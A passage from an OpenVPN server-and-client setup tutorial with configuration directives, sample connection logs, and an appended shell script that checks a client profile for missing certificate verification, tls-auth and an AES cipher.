# IF YOU HAVE NOT GENERATED INDIVIDUAL
# CERTIFICATE/KEY PAIRS FOR EACH CLIENT,
# EACH HAVING ITS OWN UNIQUE "COMMON NAME",
# UNCOMMENT THIS LINE OUT.
;duplicate-cn

# The keepalive directive causes ping-like
# messages to be sent back and forth over
# the link so that each side knows when
# the other side has gone down.
# Ping every 10 seconds, assume that remote
# peer is down if no ping received during
# a 120 second time period.
keepalive 10 120

# For extra security beyond that provided
# by SSL/TLS, create an "HMAC firewall"
# to help block DoS attacks and UDP port flooding.
#
# Generate with:
#   openvpn --genkey --secret ta.key
#
# The server and each client must have
# a copy of this key.
# The second parameter should be '0'
# on the server and '1' on the clients.
;tls-auth ta.key 0 # This file is secret

# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC        # Blowfish (default)
;cipher AES-128-CBC   # AES
;cipher DES-EDE3-CBC  # Triple-DES

# Enable compression on the VPN link.
# If you enable it here, you must also
# enable it in the client config file.
comp-lzo

# The maximum number of concurrently connected
# clients we want to allow.
;max-clients 100

# It's a good idea to reduce the OpenVPN
# daemon's privileges after initialization.
#
# You can uncomment this out on
# non-Windows systems.
;user nobody
;group nobody

# The persist options will try to avoid
# accessing certain resources on restart
# that may no longer be accessible because
# of the privilege downgrade.
persist-key
persist-tun

# Output a short status file showing
# current connections, truncated
# and rewritten every minute.
status openvpn-status.log

# By default, log messages will go to the syslog (or
# on Windows, if running as a service, they will go to
# the "\Program Files\OpenVPN\log" directory).
# Use log or log-append to override this default.
# "log" will truncate the log file on OpenVPN startup,
# while "log-append" will append to it.  Use one
# or the other (but not both).
;log         openvpn.log
;log-append  openvpn.log

# Set the appropriate level of log
# file verbosity.
#
# 0 is silent, except for fatal errors
# 4 is reasonable for general usage
# 5 and 6 can help to debug connection problems
# 9 is extremely verbose
verb 3

# Silence repeating messages.  At most 20
# sequential messages of the same message
# category will be output to the log.
;mute 20

Start the OpenVPN service on the server:

service openvpn start

Configure a client:
Install the openvpn software (http://swupdate.openvpn.org/community/releases/openvpn-2.2.1-install.exe)
Copy the files ca.crt, .crt and .key to the config folder inside the OpenVPN installation.
Create the configuration file server.ovpn with the following contents:

client
dev tap
route-method exe
route-delay 2
proto tcp
remote 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert nome_do_usuario.crt
key nome_do_usuario.key
comp-lzo
verb 3

Start the OpenVPN service from the icon that will appear next to the clock on your desktop.

For reference, here is what the log of a successful connection should look like on both the server and the client side:


# SERVER SIDE LOGS (/var/log/messages)
Nov 10 19:56:28 linux_server openvpn[31445]: MULTI: multi_create_instance called
Nov 10 19:56:28 linux_server openvpn[31445]: Re-using SSL/TLS context
Nov 10 19:56:28 linux_server openvpn[31445]: LZO compression initialized
Nov 10 19:56:28 linux_server openvpn[31445]: Control Channel MTU parms [ L:1576 D:140 EF:40 EB:0 ET:0 EL:0 ]
Nov 10 19:56:28 linux_server openvpn[31445]: Data Channel MTU parms [ L:1576 D:1450 EF:44 EB:135 ET:32 EL:0 AF:3/1 ]
Nov 10 19:56:28 linux_server openvpn[31445]: Local Options hash (VER=V4): '3e6d1056'
Nov 10 19:56:28 linux_server openvpn[31445]: Expected Remote Options hash (VER=V4): '31fdf004'
Nov 10 19:56:28 linux_server openvpn[31445]: TCP connection established with 192.168.1.150:12229
Nov 10 19:56:28 linux_server openvpn[31445]: TCPv4_SERVER link local: [undef]
Nov 10 19:56:28 linux_server openvpn[31445]: TCPv4_SERVER link remote: 192.168.1.150:12229
Nov 10 19:56:28 linux_server openvpn[31445]: 192.168.1.150:12229 TLS: Initial packet from 192.168.1.150:12229, sid=0c93e40e 445e3be2
Nov 10 19:56:28 linux_server openvpn[31445]: 192.168.1.150:12229 VERIFY OK: depth=1, /C=BR/ST=UF/L=Cidade/O=Organization/CN=Organization_CA/emailAddress=root@localhost
Nov 10 19:56:28 linux_server openvpn[31445]: 192.168.1.150:12229 VERIFY OK: depth=0, /C=BR/ST=UF/L=Cidade/O=Organization/CN=johndoe/emailAddress=root@localhost
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 Data Channel Encrypt: Cipher 'BF-CBC' initialized with 128 bit key
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 Data Channel Encrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 Data Channel Decrypt: Cipher 'BF-CBC' initialized with 128 bit key
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 Data Channel Decrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA
Nov 10 19:56:29 linux_server openvpn[31445]: 192.168.1.150:12229 [johndoe] Peer Connection Initiated with 192.168.1.150:12229
Nov 10 19:56:31 linux_server openvpn[31445]: johndoe/192.168.1.150:12229 PUSH: Received control message: 'PUSH_REQUEST'
Nov 10 19:56:31 linux_server openvpn[31445]: johndoe/192.168.1.150:12229 SENT CONTROL [johndoe]: 'PUSH_REPLY,route 192.168.0.0 255.255.0.0,route-gateway 198.51.100.1,ping 10,ping-restart 120,ifconfig 198.51.100.3 255.255.255.0,push-continuation 1' (status=1)
Nov 10 19:56:31 linux_server openvpn[31445]: johndoe/192.168.1.150:12229 MULTI: Learn: 00:ff:3c:84:94:c7 -> johndoe/192.168.1.150:12229

# CLIENT SIDE LOGS (OpenVPN client logs)
Thu Nov 10 19:56:28 2011 OpenVPN 2.2.1 Win32-MSVC++ [SSL] [LZO2] built on Jul 1 2011
Thu Nov 10 19:56:28 2011 WARNING: No server certificate verification method has been enabled. See http://openvpn.net/howto.html#mitm for more info.
Thu Nov 10 19:56:28 2011 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables
Thu Nov 10 19:56:28 2011 LZO compression initialized
Thu Nov 10 19:56:28 2011 Control Channel MTU parms [ L:1576 D:140 EF:40 EB:0 ET:0 EL:0 ]
Thu Nov 10 19:56:28 2011 Socket Buffers: R=[8192->8192] S=[8192->8192]
Thu Nov 10 19:56:28 2011 Data Channel MTU parms [ L:1576 D:1450 EF:44 EB:135 ET:32 EL:0 AF:3/1 ]
Thu Nov 10 19:56:28 2011 Local Options hash (VER=V4): '31fdf004'
Thu Nov 10 19:56:28 2011 Expected Remote Options hash (VER=V4): '3e6d1056'
Thu Nov 10 19:56:28 2011 Attempting to establish TCP connection with 200.10.10.10:1194
Thu Nov 10 19:56:28 2011 TCP connection established with 200.10.10.10:1194
Thu Nov 10 19:56:28 2011 TCPv4_CLIENT link local: [undef]
Thu Nov 10 19:56:28 2011 TCPv4_CLIENT link remote: 200.10.10.10:1194
Thu Nov 10 19:56:28 2011 TLS: Initial packet from 200.10.10.10:1194, sid=a2f0489d e1545cc7
Thu Nov 10 19:56:28 2011 VERIFY OK: depth=1, /C=BR/ST=UF/L=Cidade/O=Organization/CN=Organization_CA/emailAddress=root@localhost
Thu Nov 10 19:56:28 2011 VERIFY OK: depth=0, /C=BR/ST=UF/L=Cidade/O=Organization/CN=server/emailAddress=root@localhost
Thu Nov 10 19:56:29 2011 Data Channel Encrypt: Cipher 'BF-CBC' initialized with 128 bit key
Thu Nov 10 19:56:29 2011 Data Channel Encrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Thu Nov 10 19:56:29 2011 Data Channel Decrypt: Cipher 'BF-CBC' initialized with 128 bit key
Thu Nov 10 19:56:29 2011 Data Channel Decrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Thu Nov 10 19:56:29 2011 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA
Thu Nov 10 19:56:29 2011 [server] Peer Connection Initiated with 200.10.10.10:1194
Thu Nov 10 19:56:31 2011 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
Thu Nov 10 19:56:31 2011 PUSH: Received control message: 'PUSH_REPLY,route 192.168.0.0 255.255.0.0,route-gateway 198.51.100.1,ping 10,ping-restart 120,ifconfig 198.51.100.3 255.255.255.0,push-continuation 1'
Thu Nov 10 19:56:31 2011 OPTIONS IMPORT: timers and/or timeouts modified
Thu Nov 10 19:56:31 2011 OPTIONS IMPORT: --ifconfig/up options modified
Thu Nov 10 19:56:31 2011 OPTIONS IMPORT: route options modified
Thu Nov 10 19:56:31 2011 OPTIONS IMPORT: route-related options modified
Thu Nov 10 19:56:31 2011 ROUTE default_gateway=172.16.0.1
Thu Nov 10 19:56:31 2011 TAP-WIN32 device [Local Area Connection 2] opened: \\.\Global\{3C8494C7-498F-46A5-8535-D2C81ABB148E}.tap
Thu Nov 10 19:56:31 2011 TAP-Win32 Driver Version 9.8
Thu Nov 10 19:56:31 2011 TAP-Win32 MTU=1500
Thu Nov 10 19:56:31 2011 Notified TAP-Win32 driver to set a DHCP IP/netmask of 198.51.100.3/255.255.255.0 on interface {3C8494C7-498F-46A5-8535-D2C81ABB148E} [DHCP-serv: 198.51.100.0, lease-time: 31536000]
Thu Nov 10 19:56:31 2011 Successful ARP Flush on interface [37] {3C8494C7-498F-46A5-8535-D2C81ABB148E}
Thu Nov 10 19:56:33 2011 TEST ROUTES: 98/98 succeeded len=98 ret=1 a=0 u/d=up
Thu Nov 10 19:56:33 2011 C:\WINDOWS\system32\route.exe ADD 192.168.0.0 MASK 255.255.0.0 198.51.100.1
OK!
Thu Nov 10 19:56:33 2011 Initialization Sequence Completed
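The client log above warns that no server certificate verification method is enabled. As an added example (not from the original tutorial), the shell check below reads a client .ovpn and reports that gap plus the two settings server.conf's comments leave commented out (tls-auth and an explicit cipher); the host name vpn.example.com and the key file names in the constructed configs are assumptions.

```shell
# Added example, not part of the original post: a small linter for the client
# .ovpn from this tutorial. It flags the gap behind the client-log warning
# "No server certificate verification method has been enabled" and two more
# settings that server.conf ships commented out (tls-auth, an explicit cipher).
# vpn.example.com and the key file names are assumptions.

# The client config as written in the tutorial (constructed copy, server name assumed).
tutorial_client_config() {
    cat <<'EOF'
client
dev tap
route-method exe
route-delay 2
proto tcp
remote vpn.example.com 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert nome_do_usuario.crt
key nome_do_usuario.key
comp-lzo
verb 3
EOF
}

# The same config with the three directives added. Each one must also be
# present on the server: "tls-auth ta.key 0" there, and the same cipher.
hardened_client_config() {
    tutorial_client_config
    cat <<'EOF'
remote-cert-tls server
tls-auth ta.key 1
cipher AES-128-CBC
EOF
}

# has_directive REGEX CONFIG_TEXT: true if an active line matches.
# Anchoring at line start means lines disabled with ';' or '#' do not count.
has_directive() {
    printf '%s\n' "$2" | grep -Eq "$1"
}

# check_ovpn: read a client config on stdin, print one line per finding.
check_ovpn() {
    cfg=$(cat)
    # 1. Without this the client accepts any certificate signed by the CA as
    #    the server (any client cert would do), which the log warning is about.
    has_directive '^(remote-cert-tls|ns-cert-type)[[:space:]]+server' "$cfg" ||
        echo "missing server certificate check: add 'remote-cert-tls server'"
    # 2. tls-auth adds an HMAC to control-channel packets (see server.conf).
    has_directive '^tls-auth[[:space:]]+[^[:space:]]+[[:space:]]+1' "$cfg" ||
        echo "missing 'tls-auth <key> 1' (control channel is not HMAC-protected)"
    # 3. No explicit cipher means the BF-CBC default shown in server.conf.
    has_directive '^cipher[[:space:]]+AES' "$cfg" ||
        echo "no AES cipher set: client and server default to BF-CBC"
}

# count_findings: number of findings for the config on stdin.
count_findings() {
    check_ovpn | wc -l | tr -d ' '
}
```

Run `check_ovpn < client.ovpn` before handing a profile to a user; an empty output means the three checks pass.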
